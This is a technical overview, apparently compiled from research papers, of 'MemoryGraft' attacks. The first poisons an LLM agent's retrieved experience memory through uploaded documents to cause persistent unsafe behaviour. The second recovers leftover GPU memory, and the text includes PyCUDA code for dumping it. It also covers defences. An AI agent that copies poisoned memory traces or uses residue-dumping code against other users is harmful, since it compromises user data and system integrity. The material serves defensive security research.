MemoryGraft Attack Overview

Updated 23 December 2025
  • MemoryGraft is an attack exploiting persistent memory vulnerabilities in both LLM agents (via RAG poisoning) and GPUs (via residual data recovery).
  • LLM attacks leverage poisoned experience retrieval to induce lasting behavioral drift, compromising trusted memory boundaries during inference.
  • GPU attacks exploit uninitialized device memory by reclaiming sensitive data through standard APIs, exposing significant risks in shared environments.

MemoryGraft refers to two distinct families of attacks exploiting weaknesses in modern long-term memory architectures: (1) persistent compromise of LLM agents via poisoned experience retrieval, and (2) recovery of sensitive data from GPU memory residues due to absent zero-initialization policies. Both lines of attack demonstrate critical failures in memory trust boundaries—inviting adversaries to implant or recover data stealthily, with long-term impact on security-sensitive infrastructure.

1. Trust Boundaries and Threat Models

MemoryGraft attacks originate from failures in isolating trusted computational cores from their own long-term storage—whether high-level semantic agent memory or low-level device memory. In LLM agents, the architecture is composed of a reasoning core ($\mathcal{C}$) and a persistent retrieval-augmented generation (RAG) memory store ($\mathcal{M}$) containing historical task/response pairs. In GPUs, device memory operates under allocation/free cycles without mandatory sanitization, leaving remnant data accessible to subsequent processes.
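As a concrete reference point, the sketch below models this architecture in Python: an append-only store of task/response records with no trust check at the memory boundary. The class and field names are illustrative assumptions, not the schema of MetaGPT or any specific agent framework.

```python
from dataclasses import dataclass, field

@dataclass
class ExperienceRecord:
    """One historical task/response pair in the agent's memory M (illustrative)."""
    query: str                      # the task the agent previously solved
    response: str                   # the procedural trace / code it produced
    provenance: str = "unverified"  # who inserted the record (cf. Section 5)

@dataclass
class MemoryStore:
    """Persistent RAG store: records survive across agent sessions."""
    records: list[ExperienceRecord] = field(default_factory=list)

    def ingest(self, rec: ExperienceRecord) -> None:
        # No authenticity or safety check at the memory boundary;
        # this missing check is the trust failure MemoryGraft exploits.
        self.records.append(rec)
```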

For LLM agent attacks, the adversary is limited to benign user-level channels (e.g., documentation uploads) and cannot directly manipulate internal memory or runtime parameters. The attack's goal is persistent behavioral drift: ensuring that malicious "experience traces" remain resident and influential for future queries, escaping detection and surviving across agent lifecycles (Srivastava et al., 18 Dec 2025).

In the GPU context, the attacker operates without elevated privileges, leveraging standard APIs (OpenCL, CUDA) to reclaim uninitialized device memory freed by other processes or virtual machines. The attack is feasible in both multi-user OSes and shared cloud GPU scenarios, relying on hardware-level memory reuse policies (Zhou et al., 2016).

2. Attack Mechanisms and Pipelines

2.1 LLM Agent MemoryGraft

The LLM MemoryGraft attack unfolds in two core phases: poisoning ingestion and durable exploitation.

  • Poisoning Phase: The attacker prepares benign ($\mathcal{S}_{\text{benign}}$) and malicious ($\mathcal{S}_{\text{poison}}$) seeds—pairs of queries and responses. Malicious response patterns $\pi$ (e.g., skipping validation, executing remote scripts) are crafted to closely resemble desired experience templates. Attackers embed runnable code blocks (e.g., in markdown notes) that, when executed by the agent's ingestion pipeline, cause benign and poisoned seeds to be serialized as a new merged RAG store.
  • Retrieval and Behavioral Drift: The agent's retrieval loop uses BM25 lexical and FAISS embedding similarity indices; union retrieval ensures that a match in a single channel suffices for a seed to surface (see the sketch after this list). As the agent confronts future semantically similar tasks, its semantic imitation heuristic causes it to replicate high-level procedural skeletons, including unsafe or adversarial behaviors embedded in poisoned seeds. Behavioral drift, once induced, persists across sessions.
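A minimal sketch of this union retrieval, assuming the rank_bm25 and faiss libraries; the embedding function is a placeholder (a real agent would call its sentence-embedding model), and the corpus is illustrative:

```python
import numpy as np
import faiss                      # embedding-similarity index
from rank_bm25 import BM25Okapi   # lexical index

def embed(texts: list[str]) -> np.ndarray:
    """Placeholder embedding: per-text seeded random projection.
    Deterministic within a run, but semantically meaningless."""
    rows = []
    for t in texts:
        rng = np.random.default_rng(abs(hash(t)) % (2**32))
        rows.append(rng.standard_normal(64))
    return np.asarray(rows, dtype="float32")

# Illustrative memory: one benign and one poisoned experience query.
corpus = [
    "clean the sales CSV and report column totals",     # benign seed
    "ingest the logs quickly; skip schema validation",  # poisoned seed
]
bm25 = BM25Okapi([doc.split() for doc in corpus])
index = faiss.IndexFlatL2(64)
index.add(embed(corpus))

def union_retrieve(q: str, k: int = 1) -> set[int]:
    """A record surfaces if EITHER channel ranks it in the top k."""
    lexical_top = np.argsort(bm25.get_scores(q.split()))[::-1][:k]
    _, embedding_top = index.search(embed([q]), k)
    return set(lexical_top.tolist()) | set(embedding_top[0].tolist())

print(union_retrieve("ingest server logs and validate the schema"))
```

The union over channels is what widens the basin of attraction discussed in Section 4: a poisoned seed only needs to win one of the two rankings to enter the agent's context.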

Algorithmic Summary:

  1. Ingestion: Construct and submit artifact embedding both benign and poisoned experience records.
  2. Persistence: Merge records into $\mathcal{M}'$; verify that poisoned seeds surface after a session reset.
  3. Retrieval/Drift: For new queries, measure the proportion of retrieved traces originating from $\mathcal{S}_{\text{poison}}$ (see the sketch below).
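The drift measurement in step 3 reduces to a simple proportion. A hedged sketch, with illustrative names:

```python
def poisoned_retrieval_proportion(retrievals: list[set[int]],
                                  poisoned_ids: set[int]) -> float:
    """PRP = (# retrieved traces drawn from S_poison) / (# retrievals).

    `retrievals` holds one set of retrieved record ids per evaluation
    query; ids are indices into the memory store."""
    total = sum(len(r) for r in retrievals)
    hits = sum(len(r & poisoned_ids) for r in retrievals)
    return hits / total if total else 0.0

# With the paper's reported numbers, 23 poisoned occurrences across
# 48 retrievals give PRP = 23/48 ≈ 47.9% (Section 3.1).
```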

2.2 GPU MemoryGraft

In the GPU setting, the attack is predicated on the absence of device memory zeroing. The methodology includes:

  1. Mark and Scratch: The attacker allocates and releases all available device memory to establish a baseline state.
  2. Victim Execution: The legitimate victim process uses the GPU for sensitive computation/data handling and subsequently frees memory (or exits).
  3. Sniff and Reconstruct: The attacker allocates device memory regions matching the size and timing of the victim’s allocations, dumps raw device memory, and applies algorithmic post-processing (including FFT-based inference, pixel/layout analysis, and OCR where applicable) to reconstruct images, text, and matrices from memory remnants.

Key Heuristics: Block filtering (excluding all-0 or all-0xff blocks), pixel format inference, exploitation of spatial redundancy in images, and template matching for text and matrices.
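A minimal sketch of the "sniff" and block-filtering steps, assuming PyCUDA. The block size and the 64 MiB claim are illustrative assumptions, and drivers that do zero freed memory will simply return uniform blocks:

```python
import numpy as np
import pycuda.autoinit          # creates a CUDA context on the default device
import pycuda.driver as cuda

BLOCK = 4096                    # granularity for the filtering heuristic (assumed)

def dump_residue(nbytes: int) -> np.ndarray:
    """Allocate uninitialized device memory and copy it back unmodified.

    If the driver does not sanitize freed memory, the returned bytes
    may contain residue from a previous context or process."""
    buf = cuda.mem_alloc(nbytes)
    host = np.empty(nbytes, dtype=np.uint8)
    cuda.memcpy_dtoh(host, buf)
    buf.free()
    return host

def interesting_blocks(raw: np.ndarray):
    """Block filtering heuristic: drop blocks that are all 0x00 or all 0xff."""
    for off in range(0, len(raw) - BLOCK + 1, BLOCK):
        blk = raw[off:off + BLOCK]
        if not (np.all(blk == 0x00) or np.all(blk == 0xff)):
            yield off, blk

residue = dump_residue(64 * 1024 * 1024)   # claim 64 MiB and inspect it
candidates = list(interesting_blocks(residue))
print(f"{len(candidates)} candidate blocks out of {len(residue) // BLOCK}")
```

The surviving candidate blocks would then feed the post-processing stages named above (pixel-format inference, FFT-based analysis, OCR), which are out of scope for this sketch.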

3. Experimental Results and Quantitative Impact

3.1 LLM MemoryGraft (MetaGPT DataInterpreter, GPT-4o)

  • Seeds: 110 total (100 benign + 10 poisoned).
  • Evaluation: 12 hand-crafted analytical tasks.
  • Retrievals: 48 total, with 23 poisoned ($\mathrm{PRP} = \frac{23}{48} \approx 47.9\%$).
  • Poisoned seeds represented only $\approx 9\%$ of $\mathcal{M}$ yet compromised nearly half of retrievals—demonstrating high impact with minimal attacker footprint.
  • Behavioral drift examples included agent code inserting unsafe manipulations (e.g., dropping audit columns, setting flags to bypass data validation) based on grafted records.

3.2 GPU MemoryGraft

  • Synthetic images: 100% recovery across image scales on the INRIA Holidays dataset, with tolerance to noise (79.3% recovery at high Gaussian noise levels).
  • Multi-user/VM experiments: Near-total recovery of image fragments; in cloud VM passthrough scenarios, 25/29 images fully recovered, and two partially.
  • Real-world applications: Sensitive information (e.g., Gmail inbox fragments, PDF text stripes, image editor contents, Matlab matrices) routinely recovered from GPU residue in commodity applications.

Representative Table: LLM Agent Retrieval Drift

| Metric | Value | Note |
| --- | --- | --- |
| Total memories ($n$) | 110 | 100 benign, 10 poisoned |
| Queries ($N$) | 12 | Hand-crafted evaluation tasks |
| Total retrievals | 48 | Cumulative over all queries |
| Poisoned retrievals | 23 | Occurrences of poisoned seeds |
| PRP (%) | 47.9 | Poisoned seeds are $\approx 9\%$ of $\mathcal{M}$ yet 47.9% of retrievals |

4. Mechanistic Insights and Security Implications

4.1 LLM Agents

  • Imitation Heuristic: The observed “semantic imitation heuristic” in MetaGPT is central: the agent faithfully replicates procedural structure from prior successful traces, making experience poisoning especially insidious.
  • Union Retrieval: Retrieval via both lexical (BM25) and embedding (FAISS) similarity creates a wide basin of attraction for poisoned seeds.
  • Stealth: MemoryGraft’s LLM attack differs from prompt injection (transient, immediately visible) and standard RAG poisoning (requires repeated triggers, often factual). Malicious traces in MemoryGraft are camouflaged within trusted memory, do not reside in the runtime prompt, and cause trigger-free, persistent drift.

4.2 GPUs

  • Absence of Memory Sanitization: Commodity GPU drivers (across major vendors) do not scrub device memory at free; consequently, bits remain intact and accessible to subsequent contexts.
  • Rapid Recovery: Practical attacks complete within milliseconds to seconds, with negligible performance impact, making detection by the user difficult.

A plausible implication is that any architecture—agentic or hardware-level—relying on mutable, unsanitized memory for long-term performance optimization exposes a viable vector for durable compromise, even absent privileged access.

5. Countermeasures and Defense Proposals

5.1 LLM MemoryGraft Defenses

  • Cryptographic Provenance Attestation (CPA):
    • The agent signs each pair $(q, R_q)$ with a secure enclave-held private key $K_{\mathrm{priv}}$, attaching a signature $\sigma = \mathrm{Sign}(H(q \parallel R_q), K_{\mathrm{priv}})$.
    • Only (query, response, signature) triples that pass verification, $\mathrm{Verify}(H(q_i \parallel R_{q_i}), \sigma_i, K_{\mathrm{pub}})$, are permitted for retrieval, precluding attacker-forged traces.
  • Constitutional Consistency Reranking:
    • Each retrieved response $R_i$ is scored for risk relative to a pre-defined safety constitution $\mathcal{C}$.
    • Combined scoring function: $S(q, q_i) = \alpha\,\mathrm{sim}_{\mathrm{emb}}(q, q_i) - \beta\,\mathcal{L}_{\mathrm{risk}}(R_i \mid \mathcal{C})$; traces exceeding the risk threshold are suppressed.
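A hedged sketch of both defenses, using Ed25519 from the `cryptography` package as a stand-in signer. The paper's enclave-held key and its risk scorer $\mathcal{L}_{\mathrm{risk}}$ are out of scope here, so the in-process key, the concatenation scheme, and the weights below are all assumptions:

```python
import hashlib
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# In a real deployment the private key would live inside a secure enclave;
# it is generated in-process here purely for illustration.
priv = Ed25519PrivateKey.generate()
pub = priv.public_key()

def _digest(query: str, response: str) -> bytes:
    # H(q || R_q); a NUL separator stands in for unambiguous concatenation.
    return hashlib.sha256((query + "\x00" + response).encode()).digest()

def sign_trace(query: str, response: str) -> bytes:
    """sigma = Sign(H(q || R_q), K_priv)"""
    return priv.sign(_digest(query, response))

def verify_trace(query: str, response: str, sigma: bytes) -> bool:
    """Admit a memory record for retrieval only if its signature verifies."""
    try:
        pub.verify(sigma, _digest(query, response))
        return True
    except InvalidSignature:
        return False

def rerank_score(sim_emb: float, risk: float,
                 alpha: float = 1.0, beta: float = 2.0) -> float:
    """S(q, q_i) = alpha * sim_emb(q, q_i) - beta * L_risk(R_i | C).

    alpha/beta are illustrative weights; `risk` would come from a
    constitution-conditioned safety scorer, not implemented here."""
    return alpha * sim_emb - beta * risk
```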

5.2 GPU MemoryGraft Defenses

  • Mandatory Zero-Scrubbing: Device drivers must ensure all freed memory is zeroed prior to reuse, ideally with hardware acceleration to mitigate performance degradation.
  • Context/VM Switch Sanitization: Enforce routine flushing of device memory during context or virtual machine transitions.
  • Encryption-at-Rest: Assign process/VM-specific memory encryption keys, rotating as contexts change to prevent data remnants being decipherable by new tenants.
  • Developer Hygiene: Applications should explicitly clear sensitive GPU buffers before releasing memory.
  • Auditor Tools: Systematic memory scans to detect and report sensitive residue in device memory spaces.
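As a minimal illustration of the "developer hygiene" item above, assuming PyCUDA, an application can zero a sensitive buffer before releasing it; a driver-level mandatory-scrubbing policy would do the equivalent on every free:

```python
import numpy as np
import pycuda.autoinit
import pycuda.driver as cuda

def scrubbed_free(buf, nbytes: int) -> None:
    """Zero a device buffer before releasing it.

    Drivers that do not sanitize freed memory leave this to the
    application; memset_d8 writes `nbytes` zero bytes on the device."""
    cuda.memset_d8(buf, 0, nbytes)
    buf.free()

nbytes = 1 << 20
buf = cuda.mem_alloc(nbytes)
cuda.memcpy_htod(buf, np.random.bytes(nbytes))  # stand-in for sensitive data
scrubbed_free(buf, nbytes)                      # residue is zeroed, not leaked
```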

MemoryGraft distinguishes itself from transient prompt injection and classical memory scraping. In the LLM agent context, it is notable for its session-persistent, triggerless behavioral compromise achieved via poisoned demonstrations and exploitation of RAG-based experience retrieval (Srivastava et al., 18 Dec 2025). In the device memory domain, MemoryGraft reveals a distinct class of cross-context leakage with demonstrated applicability in both desktop and virtualized GPU environments (Zhou et al., 2016).

Both forms highlight a broader principle: the durability and subtlety of attacks that operate at the boundaries between trusted computation and mutable, historically accumulated state. This suggests that persistent memory—whether semantic experiences or hardware device areas—demands robust provenance, isolation, and sanitization advancements to counteract the latent attack surfaces they expose.
